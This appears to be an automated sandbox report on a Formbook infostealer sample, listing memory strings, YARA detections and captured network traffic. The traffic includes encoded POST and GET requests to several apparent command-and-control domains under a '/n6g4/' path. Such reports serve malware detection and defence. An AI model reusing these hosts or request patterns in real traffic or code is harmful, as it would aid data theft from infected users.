          Source: iuvRyl9i7D.exe, 00000000.00000003.249572897.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249496103.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249374645.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249531399.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249615233.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249355892.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249593017.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249472996.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249550634.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/xQ
          Source: iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/y
          Source: iuvRyl9i7D.exe, 00000000.00000003.256184309.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp4
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: control.exe, 00000015.00000002.511522267.00000000052EB000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.uspplongee.com
          Source: control.exe, 00000015.00000002.511522267.00000000052EB000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.uspplongee.com/n6g4/
          Source: iuvRyl9i7D.exe, 00000000.00000003.247623435.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247629329.0000000005F31000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: iuvRyl9i7D.exe, 00000000.00000003.247623435.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247629329.0000000005F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn)
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xingsen.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://yihen.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://yousu.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://zhanzen.uspplongee.com/
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
          Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goo
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.google.com/hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?g
          Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591A
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
          Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.google.com/setpc=s&uxe=4421591
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Press
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/calloutprid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
          Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591LMEM(
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/?gws_rd=ssl
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/?gws_rd=sslLMEMh
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngZ
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/gws_rd=ssl
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/LMEMx
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/S
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowse
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchW
          Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kt
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
          Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/urlsa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQF
          Source: unknownHTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jamesreadtanusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jamesreadtanusa.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 63 39 68 48 6f 51 43 67 61 34 4f 30 7a 35 6a 51 43 6a 59 65 32 75 34 6b 41 71 6f 70 66 77 79 34 7e 77 52 67 35 72 35 6c 47 66 36 73 76 36 54 5a 77 5f 54 68 52 30 41 58 6e 58 35 35 42 67 57 6e 73 56 54 49 73 42 6e 57 4f 39 43 4f 34 4b 30 50 48 59 44 61 73 6d 67 57 43 4d 79 48 44 71 67 33 62 6e 6a 56 76 44 44 47 57 64 54 6d 41 4e 52 59 5a 6e 63 7a 34 43 39 38 39 52 54 4c 54 36 6f 55 39 77 48 6a 44 70 59 4f 59 65 75 36 62 67 31 55 79 72 6b 6f 68 70 71 39 59 4c 6d 59 4e 44 69 66 63 44 58 64 6f 4f 4a 33 52 43 4c 64 6f 79 31 4d 78 71 41 2d 73 31 33 43 30 46 71 55 30 6d 78 4b 49 45 78 4f 39 78 58 38 52 6b 78 35 4a 44 72 32 4f 52 6a 56 36 74 63 43 39 4a 6e 4c 44 78 71 66 73 32 75 55 61 6f 61 72 46 59 42 31 46 72 59 50 44 59 42 58 7a 31 69 47 4d 6e 6b 53 49 59 39 37 52 66 61 52 43 42 63 5f 61 74 58 62 72 63 45 74 59 55 6e 4a 42 55 68 35 30 54 6e 66 66 77 44 34 30 6f 41 6c 7e 70 63 7a 41 6b 4d 61 39 66 6e 47 6e 71 7e 6a 42 65 47 53 63 37 45 6b 4d 67 28 75 7e 37 30 62 37 78 48 4d 34 62 79 33 4a 63 68 74 51 48 43 54 56 36 79 75 37 47 62 7a 38 50 70 62 78 6a 56 50 76 56 28 78 36 51 55 46 74 69 70 43 45 44 4b 37 4f 79 6a 78 6f 62 74 52 49 4a 67 48 78 38 6d 64 66 4c 6b 65 43 64 79 73 50 54 38 45 49 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=c9hHoQCga4O0z5jQCjYe2u4kAqopfwy4~wRg5r5lGf6sv6TZw_ThR0AXnX55BgWnsVTIsBnWO9CO4K0PHYDasmgWCMyHDqg3bnjVvDDGWdTmANRYZncz4C989RTLT6oU9wHjDpYOYeu6bg1Uyrkohpq9YLmYNDifcDXdoOJ3RCLdoy1MxqA-s13C0FqU0mxKIExO9xX8Rkx5JDr2ORjV6tcC9JnLDxqfs2uUaoarFYB1FrYPDYBXz1iGMnkSIY97RfaRCBc_atXbrcEtYUnJBUh50TnffwD40oAl~pczAkMa9fnGnq~jBeGSc7EkMg(u~70b7xHM4by3JchtQHCTV6yu7Gbz8PpbxjVPvV(x6QUFtipCEDK7OyjxobtRIJgHx8mdfLkeCdysPT8EIg).
          Source: unknownDNS traffic detected: queries for: www.dems-clicks.com
          Source: global trafficHTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV HTTP/1.1Host: www.dems-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu HTTP/1.1Host: www.kickball.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6g4/?3fe=er/aW89j3eiO30Tth32zztWhmYSSn5MxbIqpkVj2P1EZBbsuTNG7fFHg+MTirOdy738q&r2MLI=tjrDPFcXi HTTP/1.1Host: www.bldh45.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=DeftxpR1OWSh4aZAk/LljwybnwLEUT8BN/DlQaDlT4i7MS32eqTj8UaDk/+v6eXHg19D HTTP/1.1Host: www.properscooter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6g4/?3fe=YEAzGNA1BgiQpi8GImtX9JznxcWz/G0oG2K4jwCI3/8B8s5l+/t603YZPdD+BzgPPrJ7&r2MLI=tjrDPFcXi HTTP/1.1Host: www.uspplongee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
